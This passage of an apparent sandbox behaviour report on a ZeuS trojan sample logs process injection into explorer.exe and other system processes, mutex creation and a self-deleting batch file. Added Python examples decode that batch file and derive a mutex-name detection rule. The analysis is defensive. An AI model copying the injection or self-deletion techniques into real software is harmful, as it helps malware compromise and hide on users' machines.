Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 140000 Length: 27000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2003107723
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 140000 Length: 159744 Value: 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 00 31 60 2D 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 08 02 00 00 3A 00 00 00 00 00 success or wait 2003109680
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 162D50 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2003110519
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 162000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2003110647
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 162D50 Length: 4 Value: 00 00 00 00 success or wait 2003110804
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 162D64 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2003110926
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 162000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2003111050
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 162D64 Length: 4 Value: 00 00 14 00 success or wait 2003111205
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 163214 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2003111341
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 163000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2003111469
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 163214 Length: 4 Value: 08 00 00 00 success or wait 2003111625
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 163218 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2003111760
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 163000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2003111887
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 163218 Length: 4 Value: 0C 00 00 00 success or wait 2003112044
Process terminated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe success or wait 2003738647
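The "File write" to tmpeded911e.bat above is the start of the batch file that the process then runs through cmd.exe /c, just before it terminates. Decoding the hex gives a label, a del of the ZeuS binary's own path and an if exist check on that same path, i.e. the opening of a delete-retry loop; the report shows only the first 100 of the 206 bytes written, so the rest of the script is not reconstructed here. The following is an added example, not part of the Joebox report; HEX_DUMP is copied from the entry above.

```python
"""Recover the dropper's self-delete batch script from the report's hex dump.

Added example, not part of the Joebox report. HEX_DUMP is copied from the
"File write ... tmpeded911e.bat" entry: 206 bytes were written, the report
shows the first 100, so the last line comes out truncated.
"""
from __future__ import annotations

import re

HEX_DUMP = (
    "40 65 63 68 6F 20 6F 66 66 0D 0A 3A 64 0D 0A 64 65 6C 20 22 43 3A 5C "
    "5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 "
    "63 61 36 36 34 34 39 36 32 33 34 64 33 66 32 63 32 61 33 37 31 2E 65 "
    "78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 5A 65 75 53 5F "
    "62 69 6E 61 72 79 5F 66"
)


def hexdump_to_bytes(dump: str) -> bytes:
    """Space-separated hex as the report prints it -> raw bytes."""
    return bytes.fromhex("".join(dump.split()))


def decode_batch(dump: str) -> list[str]:
    """Split the dump as a CRLF batch file; a cut-off dump leaves a partial last line."""
    text = hexdump_to_bytes(dump).decode("ascii", errors="replace")
    return text.split("\r\n")


def deleted_paths(lines: list[str]) -> list[str]:
    """Quoted paths named by `del` lines: what the dropper removes from disk."""
    out = []
    for line in lines:
        m = re.match(r'^\s*del\s+"([^"]+)"', line, re.IGNORECASE)
        if m:
            out.append(m.group(1))
    return out


def retry_loop_labels(lines: list[str]) -> list[str]:
    """Labels (':name') directly followed by a del: the retry pattern used to
    delete a file that is still locked by the process that is exiting."""
    labels = []
    for i, line in enumerate(lines):
        if line.startswith(":") and i + 1 < len(lines) and deleted_paths([lines[i + 1]]):
            labels.append(line[1:])
    return labels
```

The path the del line names is the same C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe that the "Process terminated" entry above records, which is why a label-and-retry loop is needed: the file cannot be unlinked until that process has exited.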
+ Sections
+ General
Start time: 06:06:38
Start date: 01/12/2011
Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe
Commandline: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe
Imagebase: 0x400000
File size: 171520 bytes
MD5 hash: 0FA8C6FF6A0816FF75416A307F79FC7A
File Activities:
+ File opened
| File Path | Access | Options | Content overwritten | Completion | Count | Source Address |
|---|---|---|---|---|---|---|
| C:\Documents and Settings\Administrator\Application Data\887021879.log | read attributes and synchronize and generic read | synchronous io non alert and non directory file | false | success or wait | 1 | 3B182A |
| C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe | read attributes and synchronize and generic read | synchronous io non alert and non directory file | false | success or wait | 1 | 41AE9D |
+ File read
| File Path | Offset | Length | Value | Completion | Count | Source Address |
|---|---|---|---|---|---|---|
| C:\Documents and Settings\Administrator\Application Data\887021879.log | none | 5 | 31 36 37 39 30 | success or wait | 1 | 3B1939 |
| C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe | none | 171520 | 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 | success or wait | 1 | 41AEF0 |
Section Activities:
+ Section loaded by Windows
| File Path | Access | Type | Base | Size | Mapped to pid | Protection | Completion | Count |
|---|---|---|---|---|---|---|---|---|
| \KnownDlls\kernel32.dll | write and read and execute | unknown | 7C800000 | 1007616 | own pid | read write | success or wait | 1 |
| none | query and write and read and execute and extend size | reserve | 7C800000 | 1007616 | own pid | read write | success or wait | 1 |
| \NLS\NlsSectionUnicode | read | unknown | 270000 | 90112 | own pid | readonly | success or wait | 1 |
| \NLS\NlsSectionLocale | read | unknown | 290000 | 266240 | own pid | readonly | success or wait | 1 |
| \NLS\NlsSectionSortkey | query and read | unknown | 2E0000 | 266240 | own pid | readonly | success or wait | 1 |
| \NLS\NlsSectionSortTbls | read | unknown | 330000 | 24576 | own pid | readonly | success or wait | 1 |
| \NLS\NlsSectionSortkey00000409 | read | unknown | 330000 | 24576 | own pid | readonly | object name not found | 1 |
| \NLS\NlsSectionSortkey00000409 | read | unknown | 330000 | 24576 | own pid | readonly | object name not found | 1 |
| \KnownDlls\GDI32.dll | write and read and execute | unknown | 77F10000 | 299008 | own pid | read write | success or wait | 1 |
| \KnownDlls\USER32.dll | write and read and execute | unknown | 7E410000 | 593920 | own pid | read write | success or wait | 1 |
| \KnownDlls\ole32.dll | write and read and execute | unknown | 774E0000 | 1302528 | own pid | read write | success or wait | 1 |
| \KnownDlls\ADVAPI32.dll | write and read and execute | unknown | 77DD0000 | 634880 | own pid | read write | success or wait | 1 |
| \KnownDlls\RPCRT4.dll | write and read and execute | unknown | 77E70000 | 602112 | own pid | read write | success or wait | 1 |
| \KnownDlls\Secur32.dll | write and read and execute | unknown | 77FE0000 | 69632 | own pid | read write | success or wait | 1 |
| \KnownDlls\msvcrt.dll | write and read and execute | unknown | 77C10000 | 360448 | own pid | read write | success or wait | 1 |
| \KnownDlls\OLEAUT32.dll | write and read and execute | unknown | 77120000 | 569344 | own pid | read write | success or wait | 1 |
| C:\WINDOWS\system32\imm32.dll | write and read and execute | commit | 340000 | 110592 | own pid | execute | success or wait | 1 |
| C:\WINDOWS\system32\imm32.dll | write and read and execute | commit | 340000 | 110592 | own pid | execute | success or wait | 1 |
| C:\WINDOWS\system32\imm32.dll | query and write and read and execute | image | 76390000 | 118784 | own pid | read write | success or wait | 1 |
| \NLS\NlsSectionCType | read | unknown | 370000 | 12288 | own pid | readonly | success or wait | 1 |
| none | query and write and read | commit | BD0000 | 16384 | own pid | read write | success or wait | 1 |
| none | query and write and read | commit | BD0000 | 16384 | own pid | read write | success or wait | 1 |
+ Section loaded by program
| File Path | Access | Type | Base | Size | Mapped to pid | Protection | Completion | Count | Source Address |
|---|---|---|---|---|---|---|---|---|---|
| \KnownDlls\SHLWAPI.dll | write and read and execute | unknown | 77F60000 | 483328 | own pid | read write | success or wait | 1 | 3B05D3 |
| \KnownDlls\SHELL32.dll | write and read and execute | unknown | 7C9C0000 | 8482816 | own pid | read write | success or wait | 1 | 3B05D3 |
| C:\WINDOWS\system32\shell32.dll | read | commit | 930000 | 8462336 | own pid | readonly | success or wait | 1 | 3B05D3 |
| C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll | write and read and execute | commit | 930000 | 1056768 | own pid | execute | success or wait | 1 | 3B05D3 |
| C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll | query and write and read and execute | image | 773D0000 | 1060864 | own pid | read write | success or wait | 1 | 3B05D3 |
| C:\WINDOWS\WindowsShell.Manifest | write and read and execute | commit | 3E0000 | 4096 | own pid | execute | success or wait | 1 | 3B05D3 |
| C:\WINDOWS\WindowsShell.Manifest | query and read | commit | 3E0000 | 4096 | own pid | readonly | success or wait | 1 | 3B05D3 |
| C:\WINDOWS\WindowsShell.Manifest | read | commit | 3E0000 | 4096 | own pid | readonly | success or wait | 1 | 3B05D3 |
| \KnownDlls\comctl32.dll | write and read and execute | unknown | 5D090000 | 630784 | own pid | read write | success or wait | 1 | 3B05D3 |
| C:\WINDOWS\system32\comctl32.dll | read | commit | 930000 | 618496 | own pid | readonly | success or wait | 1 | 3B05D3 |
| \KnownDlls\WS2_32.dll | write and read and execute | unknown | 930000 | 618496 | own pid | readonly | object name not found | 1 | 3B05D3 |
| C:\WINDOWS\system32\ws2_32.dll | query and write and read and execute | image | 71AB0000 | 94208 | own pid | read write | success or wait | 1 | 3B05D3 |
| \KnownDlls\WS2HELP.dll | write and read and execute | unknown | 71AB0000 | 94208 | own pid | read write | object name not found | 1 | 3B05D3 |
| C:\WINDOWS\system32\ws2help.dll | query and write and read and execute | image | 71AA0000 | 32768 | own pid | read write | success or wait | 1 | 3B05D3 |
| \KnownDlls\CRYPT32.dll | write and read and execute | unknown | 71AA0000 | 32768 | own pid | read write | object name not found | 1 | 3B05D3 |
| C:\WINDOWS\system32\crypt32.dll | query and write and read and execute | image | 77A80000 | 610304 | own pid | read write | success or wait | 1 | 3B05D3 |
| \KnownDlls\MSASN1.dll | write and read and execute | unknown | 77A80000 | 610304 | own pid | read write | object name not found | 1 | 3B05D3 |
| C:\WINDOWS\system32\msasn1.dll | query and write and read and execute | image | 77B20000 | 73728 | own pid | read write | success or wait | 1 | 3B05D3 |
| \KnownDlls\WININET.dll | write and read and execute | unknown | 3D930000 | 942080 | own pid | read write | success or wait | 1 | 3B05D3 |
| \KnownDlls\Normaliz.dll | write and read and execute | unknown | 440000 | 36864 | own pid | read write | conflicting addresses | 1 | 3B05D3 |
| \KnownDlls\urlmon.dll | write and read and execute | unknown | 78130000 | 1257472 | own pid | read write | success or wait | 1 | 3B05D3 |
| \KnownDlls\iertutil.dll | write and read and execute | unknown | 3DFD0000 | 2002944 | own pid | read write | success or wait | 1 | 3B05D3 |
| \KnownDlls\NETAPI32.dll | write and read and execute | unknown | 3DFD0000 | 2002944 | own pid | read write | object name not found | 1 | 3B05D3 |
| C:\WINDOWS\system32\netapi32.dll | query and write and read and execute | image | 5B860000 | 348160 | own pid | read write | success or wait | 1 | 3B05D3 |
Registry Activities:
+ Key value queried
| Key Path | Name | Completion | Count | Source Address |
|---|---|---|---|---|
| HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders | Okmaykid | object name not found | 1 | 419F57 |
Mutant Activities:
+ Mutant created
| Name | Completion | Count | Source Address |
|---|---|---|---|
| \BaseNamedObjects\Local\{70C7FA5B-C2C6-5FB1-185B-81F8EE8A3A3D} | success or wait | 1 | 41546B |
| \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-C250-CCC334817706} | success or wait | 2 | 414B82 |
| \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-AE51-CCC358807706} | success or wait | 2 | 414B82 |
| \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A252-CCC354837706} | success or wait | 2 | 414B82 |
| \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA52-CCC34C837706} | success or wait | 2 | 414B82 |
| \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-6E52-CCC398837706} | success or wait | 2 | 414B82 |
| \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7252-CCC384837706} | success or wait | 2 | 414B82 |
| \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA53-CCC34C827706} | success or wait | 2 | 414B82 |
| \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0E53-CCC3F8827706} | success or wait | 2 | 414B82 |
| \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-DA54-CCC32C857706} | success or wait | 2 | 414B82 |
| \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-8A54-CCC37C857706} | success or wait | 2 | 414B82 |
| \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BE54-CCC348857706} | success or wait | 2 | 414B82 |
| \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E55-CCC3E8847706} | success or wait | 2 | 414B82 |
| \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A256-CCC354877706} | success or wait | 1 | 414B82 |
| \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-E257-CCC314867706} | success or wait | 1 | 414B82 |
| \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0651-CCC3F0807706} | success or wait | 2 | 414B82 |
| \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-3A51-CCC3CC807706} | success or wait | 2 | 414B82 |
| \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0257-CCC3F4867706} | success or wait | 2 | 414B82 |
| \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-2A50-CCC3DC817706} | success or wait | 1 | 414B82 |
| \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1252-CCC3E4837706} | success or wait | 2 | 414B82 |
| \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A654-CCC350857706} | success or wait | 2 | 414B82 |
| \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1657-CCC3E0867706} | success or wait | 2 | 414B82 |
| \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7658-CCC380897706} | success or wait | 2 | 414B82 |
| \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E58-CCC3E8897706} | success or wait | 2 | 414B82 |
| \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-6E57-CCC398867706} | success or wait | 1 | 414B82 |
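Every mutant on this page is GUID-shaped, and the names are far from random. Within the 5FEF9DAD-A530-7099 family only the fourth group and the middle two bytes of the fifth group vary, and across all 27 names the report shows (the two ending in 185B-81F8EE8A3A3D from the first process included) the fourth group XORed with bytes 2-3 of the fifth group is the constant F6D1. The following added example (not part of the Joebox report) derives that template and invariant from the names themselves and turns them into a matching rule; the template and the constant are observations from this report alone, so treat them as sample-specific until checked against other samples.

```python
"""Extract the template shared by the mutant names in this report.

Added example, not part of the Joebox report. MUTANTS holds every mutant
name the report shows (the first process's two names included). The
template and the 0xF6D1 constant are derived from these names only.
"""
from __future__ import annotations

import re
from collections import Counter

FAMILY_PREFIX = "5FEF9DAD-A530-7099"

MUTANTS = [
    r"\BaseNamedObjects\Global\{50BFCA5C-F2C1-7FC9-185B-81F8EE8A3A3D}",
    r"\BaseNamedObjects\Local\{70C7FA5B-C2C6-5FB1-185B-81F8EE8A3A3D}",
    r"\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-2E59-CCC3D8887706}",
    r"\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-C250-CCC334817706}",
    r"\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-AE51-CCC358807706}",
    r"\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A252-CCC354837706}",
    r"\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA52-CCC34C837706}",
    r"\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-6E52-CCC398837706}",
    r"\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7252-CCC384837706}",
    r"\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA53-CCC34C827706}",
    r"\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0E53-CCC3F8827706}",
    r"\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-DA54-CCC32C857706}",
    r"\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-8A54-CCC37C857706}",
    r"\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BE54-CCC348857706}",
    r"\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E55-CCC3E8847706}",
    r"\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A256-CCC354877706}",
    r"\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-E257-CCC314867706}",
    r"\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0651-CCC3F0807706}",
    r"\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-3A51-CCC3CC807706}",
    r"\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0257-CCC3F4867706}",
    r"\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-2A50-CCC3DC817706}",
    r"\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1252-CCC3E4837706}",
    r"\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A654-CCC350857706}",
    r"\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1657-CCC3E0867706}",
    r"\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7658-CCC380897706}",
    r"\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E58-CCC3E8897706}",
    r"\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-6E57-CCC398867706}",
]

GUID_RE = re.compile(
    r"\{([0-9A-F]{8})-([0-9A-F]{4})-([0-9A-F]{4})-([0-9A-F]{4})-([0-9A-F]{12})\}$")


def guid_groups(name: str) -> tuple[str, ...]:
    """The five dash-separated groups of a GUID-shaped object name."""
    m = GUID_RE.search(name)
    if m is None:
        raise ValueError(f"not a GUID-shaped name: {name}")
    return m.groups()


def family(names: list[str], prefix: str = FAMILY_PREFIX) -> list[str]:
    """Names whose first three groups equal prefix."""
    return [n for n in names if "-".join(guid_groups(n)[:3]) == prefix]


def template(names: list[str]) -> str:
    """Per-character template: the literal where all names agree, '?' elsewhere."""
    guids = ["-".join(guid_groups(n)) for n in names]
    return "".join(col[0] if len(set(col)) == 1 else "?" for col in zip(*guids))


def xor_key(name: str) -> int:
    """Fourth group XOR bytes 2-3 of the fifth group."""
    g = guid_groups(name)
    return int(g[3], 16) ^ int(g[4][4:8], 16)


def shared_key(names: list[str]) -> int | None:
    """The XOR constant if every name yields the same one, else None."""
    keys = Counter(xor_key(n) for n in names)
    return next(iter(keys)) if len(keys) == 1 else None


def matches(name: str, tmpl: str, key: int) -> bool:
    """Detection rule: fits the template and satisfies the XOR invariant."""
    guid = "-".join(guid_groups(name))
    return all(t == "?" or t == c for t, c in zip(tmpl, guid)) and xor_key(name) == key
```

The template alone ("5FEF9DAD-A530-7099-??5?-CCC3??8?7706") already separates this family from the rest of \BaseNamedObjects; the XOR invariant is the stricter check, since it ties the two variable parts together and rejects a name that merely copies the fixed characters.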
Process Activities:
+ Process terminated
| PID | Filepath | Completion | Count | Source Address |
|---|---|---|---|---|
| 224 | C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe | success or wait | 1 | 415816 |
| 224 | C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe | success or wait | 0 | 415816 |
Thread Activities:
+ Thread created
| TID | PID | EIP | Injected | Filepath | Completion | Count | Source Address |
|---|---|---|---|---|---|---|---|
| 4008 | 1636 | 7C8106F9 | true | C:\WINDOWS\explorer.exe | success or wait | 1 | 40533E |
| 1656 | 1828 | 7C8106F9 | true | C:\WINDOWS\system32\ctfmon.exe | success or wait | 1 | 40533E |
| 2512 | 236 | 7C8106F9 | true | C:\WINDOWS\system32\wscntfy.exe | success or wait | 1 | 40533E |
| 2544 | 1960 | 7C8106F9 | true | C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe | success or wait | 1 | 40533E |
+ Thread resumed
| TID | PID | Completion | Count | Source Address |
|---|---|---|---|---|
| 4008 | 1636 | success or wait | 1 | 40533E |
| 1656 | 1828 | success or wait | 1 | 40533E |
| 2512 | 236 | success or wait | 1 | 40533E |
| 2544 | 1960 | success or wait | 1 | 40533E |
Memory Activities:
+ Memory written
| PID | Filepath | Base | Length | Value | Completion | Count | Source Address |
|---|---|---|---|---|---|---|---|
| 1636 | C:\WINDOWS\explorer.exe | 1F70000 | 159744 | 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 00 31 60 2D 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 08 02 00 00 3A 00 00 00 00 | success or wait | 1 | 41A688 |
| 1636 | C:\WINDOWS\explorer.exe | 1F92D50 | 4 | 00 00 00 00 | success or wait | 1 | 414C88 |
| 1636 | C:\WINDOWS\explorer.exe | 1F92D64 | 4 | 00 00 F7 01 | success or wait | 1 | 414CA8 |
| 1636 | C:\WINDOWS\explorer.exe | 1F93214 | 4 | C0 02 00 00 | success or wait | 1 | 41442D |
| 1636 | C:\WINDOWS\explorer.exe | 1F93218 | 4 | 90 02 00 00 | success or wait | 1 | 41442D |
| 1828 | C:\WINDOWS\system32\ctfmon.exe | A30000 | 159744 | 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 00 31 60 2D 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 08 02 00 00 3A 00 00 00 00 | success or wait | 1 | 41A688 |
| 1828 | C:\WINDOWS\system32\ctfmon.exe | A52D50 | 4 | 00 00 00 00 | success or wait | 1 | 414C88 |
| 1828 | C:\WINDOWS\system32\ctfmon.exe | A52D64 | 4 | 00 00 A3 00 | success or wait | 1 | 414CA8 |
| 1828 | C:\WINDOWS\system32\ctfmon.exe | A53214 | 4 | 70 01 00 00 | success or wait | 1 | 41442D |
| 1828 | C:\WINDOWS\system32\ctfmon.exe | A53218 | 4 | 74 01 00 00 | success or wait | 1 | 41442D |
| 236 | C:\WINDOWS\system32\wscntfy.exe | AE0000 | 159744 | 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 00 31 60 2D 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 08 02 00 00 3A 00 00 00 00 | success or wait | 1 | 41A688 |
| 236 | C:\WINDOWS\system32\wscntfy.exe | B02D50 | 4 | 00 00 00 00 | success or wait | 1 | 414C88 |
| 236 | C:\WINDOWS\system32\wscntfy.exe | B02D64 | 4 | 00 00 AE 00 | success or wait | 1 | 414CA8 |
| 236 | C:\WINDOWS\system32\wscntfy.exe | B03214 | 4 | 9C 00 00 00 | success or wait | 1 | 41442D |
| 236 | C:\WINDOWS\system32\wscntfy.exe | B03218 | 4 | A0 00 00 00 | success or wait | 1 | 41442D |
+ Memory allocated
| PID | Filepath | Base | Length | Protection | Completion | Count | Source Address |
|---|---|---|---|---|---|---|---|
| 224 | C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe | 380000 | 12FF1C | page read and write | success or wait | 1 | 406915 |
| 224 | C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe | 380000 | 12FF20 | page read and write | success or wait | 1 | 406915 |
| 224 | C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe | 381000 | 12FBFC | page read and write | success or wait | 1 | 406915 |
| 224 | C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe | 390000 | 12FEA4 | page execute and read and write | success or wait | 1 | 4014B4 |
| 224 | C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe | 390000 | 12FEA8 | page execute and read and write | success or wait | 1 | 4014B4 |
| 224 | C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe | 3B0000 | 12FEA8 | page execute and read and write | success or wait | 1 | 40167E |
| 224 | C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe | 400000 | 12FD60 | page execute and read and write | success or wait | 1 | 3B0F29 |
| 224 | C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe | B50000 | 12F910 | page read and write | success or wait | 1 | 414961 |
| 224 | C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe | B50000 | 12F914 | page read and write | success or wait | 1 | 414961 |
| 224 | C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe | 181000 | 12F448 | page read and write | success or wait | 1 | 4019F1 |
| 224 | C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe | 182000 | 12F448 | page read and write | success or wait | 1 | 4019F1 |
| 224 | C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe | 183000 | 12F448 | page read and write | success or wait | 1 | 4019F1 |
| 224 | C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe | 184000 | 12F628 | page read and write | success or wait | 1 | 4019F1 |
| 224 | C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe | BD0000 | 12FAEC | page read and write | success or wait | 1 | 41AED8 |
| 1636 | C:\WINDOWS\explorer.exe | 1F70000 | 12F850 | page execute and read and write | success or wait | 1 | 41A5F6 |
